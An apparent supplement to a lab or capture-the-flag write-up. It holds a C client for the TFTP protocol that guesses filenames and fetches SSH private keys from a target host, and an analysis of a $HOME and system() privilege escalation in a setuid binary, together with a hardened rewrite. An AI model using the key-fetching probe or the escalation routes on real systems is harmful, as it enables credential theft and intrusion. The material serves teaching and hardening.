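The TFTP step in the writeup above works only because the filename could be guessed from the FTP note: TFTP (RFC 1350) has no directory listing, so every file has to be requested by name, and an ERROR packet (or silence) is the only answer to a wrong guess. The following is an added example, not code from the original post: a minimal read-request client in C that tries a list of candidate names against a server and keeps the ones that exist. It assumes a plain RFC 1350 server on UDP/69 with no option negotiation (tftp-hpa on the target answered that way); the host, the candidate names and the 3-second timeout are the caller's choice.

```c
/* Added example (not from the writeup): minimal RFC 1350 TFTP read client
 * for probing a server that offers no directory listing. Assumes a plain
 * TFTP server on UDP/69 without option negotiation; host and candidate
 * filenames come from the command line. */
#define _DEFAULT_SOURCE
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

enum { OP_RRQ = 1, OP_DATA = 3, OP_ACK = 4, OP_ERROR = 5 };

/* RRQ layout: | 0x00 0x01 | filename | 0 | "octet" | 0 |.
 * Returns the packet length, or 0 if the request does not fit in buf. */
size_t tftp_build_rrq(uint8_t *buf, size_t cap, const char *filename) {
    size_t flen = strlen(filename);
    size_t need = 2 + flen + 1 + 5 + 1;
    if (need > cap) return 0;
    buf[0] = 0; buf[1] = OP_RRQ;
    memcpy(buf + 2, filename, flen + 1);       /* filename plus its NUL */
    memcpy(buf + 2 + flen + 1, "octet", 6);    /* mode plus its NUL */
    return need;
}

/* ACK layout: | 0x00 0x04 | block# (big-endian) |, always 4 bytes. */
size_t tftp_build_ack(uint8_t *buf, uint16_t block) {
    buf[0] = 0; buf[1] = OP_ACK;
    buf[2] = (uint8_t)(block >> 8); buf[3] = (uint8_t)block;
    return 4;
}

/* Classify a server packet: 0 = DATA (block/payload set), 1 = ERROR
 * (err_code set, 1 means file not found), -1 = malformed or unexpected. */
int tftp_parse_data(const uint8_t *pkt, size_t len, uint16_t *block,
                    const uint8_t **payload, size_t *payload_len,
                    uint16_t *err_code) {
    if (len < 4) return -1;
    uint16_t op = (uint16_t)((pkt[0] << 8) | pkt[1]);
    uint16_t num = (uint16_t)((pkt[2] << 8) | pkt[3]);
    if (op == OP_ERROR) { if (err_code) *err_code = num; return 1; }
    if (op != OP_DATA || len > 516) return -1;
    *block = num; *payload = pkt + 4; *payload_len = len - 4;
    return 0;
}

/* Request one file and stream it to out. Returns bytes received, or -1 if
 * the server sent ERROR, answered with junk, or stayed silent. */
long tftp_get(const char *host, const char *name, FILE *out) {
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) return -1;
    struct timeval tv = { 3, 0 };                 /* give up after 3 s of silence */
    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    struct sockaddr_in srv = { .sin_family = AF_INET, .sin_port = htons(69) };
    if (inet_pton(AF_INET, host, &srv.sin_addr) != 1) { close(s); return -1; }

    uint8_t pkt[1024], ack[4];
    size_t n = tftp_build_rrq(pkt, sizeof pkt, name);
    if (n == 0 || sendto(s, pkt, n, 0, (struct sockaddr *)&srv, sizeof srv) < 0) {
        close(s); return -1;
    }
    long total = 0;
    uint16_t expect = 1;
    for (;;) {
        struct sockaddr_in from; socklen_t fl = sizeof from;
        ssize_t r = recvfrom(s, pkt, sizeof pkt, 0, (struct sockaddr *)&from, &fl);
        if (r < 0) { total = -1; break; }         /* timeout: nothing came back */
        uint16_t block = 0, err = 0; const uint8_t *data; size_t dlen;
        if (tftp_parse_data(pkt, (size_t)r, &block, &data, &dlen, &err) != 0) {
            total = -1; break;                    /* ERROR (wrong guess) or junk */
        }
        /* The server answers from an ephemeral port: ACK there, not to 69. */
        tftp_build_ack(ack, block);
        sendto(s, ack, 4, 0, (struct sockaddr *)&from, fl);
        if (block != expect) continue;            /* retransmit of an old block */
        fwrite(data, 1, dlen, out);
        total += (long)dlen;
        if (dlen < 512) break;                    /* short block ends the transfer */
        expect++;
    }
    close(s);
    return total;
}

int main(int argc, char **argv) {
    if (argc < 3) { fprintf(stderr, "usage: %s host name...\n", argv[0]); return 2; }
    for (int i = 2; i < argc; i++) {
        FILE *f = fopen(argv[i], "wb");
        if (!f) continue;
        long got = tftp_get(argv[1], argv[i], f);
        fclose(f);
        if (got < 0) { remove(argv[i]); printf("%-24s absent\n", argv[i]); }
        else printf("%-24s %ld bytes\n", argv[i], got);
    }
    return 0;
}
```

Build with `cc -o tftpprobe tftpprobe.c` and run it as `./tftpprobe 172.20.10.5 id_rsa id_rsa.pub authorized_keys`; each name that the server serves is written to the current directory, the rest are reported absent. The ACKs go back to the address `recvfrom` filled in rather than to port 69 because RFC 1350 servers move each transfer to a fresh ephemeral port after the first DATA block.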
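For the privilege escalation section above: the decompiled main of `/opt/showMetheKey` is dangerous for two independent reasons. The path is built from `$HOME`, which the caller sets, and `system()` starts `/bin/sh` with the caller's entire environment while both real and effective uid are 0. The C below is an added example, not code from the box, that puts the environment-derived path next to a hardened resolution which asks the passwd database for the real uid's home, copies the file without a shell, and drops privileges before touching anything (refusing to continue if the drop did not stick). The function names, the 4096-byte path buffer and the `HOME=/tmp/attacker-controlled` value used for checking are this example's own assumptions.

```c
/* Added example (not code from the box): the path resolution behind
 * /opt/showMetheKey next to a hardened version. The vulnerable form trusts
 * $HOME, which the unprivileged caller sets; the hardened form derives the
 * home directory from the real uid's passwd entry, drops privileges before
 * opening anything, and never starts a shell. Function names and buffer
 * sizes are this example's own choices. */
#define _DEFAULT_SOURCE
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* What system("cat $HOME/.ssh/id_rsa") amounts to once the shell has
 * expanded $HOME: whoever executes the binary decides which file is read.
 * Returns 0 with the path in out, -1 if HOME is unset, relative or too long. */
int key_path_from_env(char *out, size_t cap) {
    const char *home = getenv("HOME");
    if (home == NULL || home[0] != '/') return -1;
    int n = snprintf(out, cap, "%s/.ssh/id_rsa", home);
    return (n > 0 && (size_t)n < cap) ? 0 : -1;
}

/* Hardened: identify the real caller through the passwd database. The
 * environment is never consulted, so HOME=/root changes nothing. */
int key_path_from_passwd(char *out, size_t cap) {
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL || pw->pw_dir == NULL || pw->pw_dir[0] != '/') return -1;
    int n = snprintf(out, cap, "%s/.ssh/id_rsa", pw->pw_dir);
    return (n > 0 && (size_t)n < cap) ? 0 : -1;
}

/* Copy the file ourselves instead of shelling out to cat: no PATH lookup,
 * no word splitting, no inherited shell environment. Returns bytes copied,
 * or -1 if the file cannot be opened. */
long dump_file(const char *path, FILE *out) {
    FILE *f = fopen(path, "rb");
    if (f == NULL) return -1;
    char buf[4096]; size_t n; long total = 0;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0) {
        fwrite(buf, 1, n, out);
        total += (long)n;
    }
    fclose(f);
    return total;
}

/* Drop to the real uid/gid and verify the drop cannot be undone. Returns 0
 * when the process is confined to the caller's identity. Order matters:
 * the gid must go first, since a non-root uid cannot change gid afterwards. */
int drop_privileges(void) {
    uid_t ruid = getuid(); gid_t rgid = getgid();
    if (setgid(rgid) != 0 || setuid(ruid) != 0) return -1;
    if (ruid != 0 && setuid(0) == 0) return -1;   /* root came back: refuse to run */
    return 0;
}

int main(void) {
    /* The caller can already read its own key, so root is not needed for
     * anything here; shed it before the first file operation. */
    if (drop_privileges() != 0) return 1;
    char path[4096];
    if (key_path_from_passwd(path, sizeof path) != 0) return 1;
    return dump_file(path, stdout) < 0 ? 1 : 0;
}
```

With the hardened build, `HOME=/root ./showMetheKey` still resolves to the caller's own `~/.ssh/id_rsa`, and since the process has already given up uid 0 it could not open `/root/.ssh/id_rsa` even if the path were forged. The privilege drop plus the absence of `system()` also closes the `PATH` route against `cat` that the original binary leaves open.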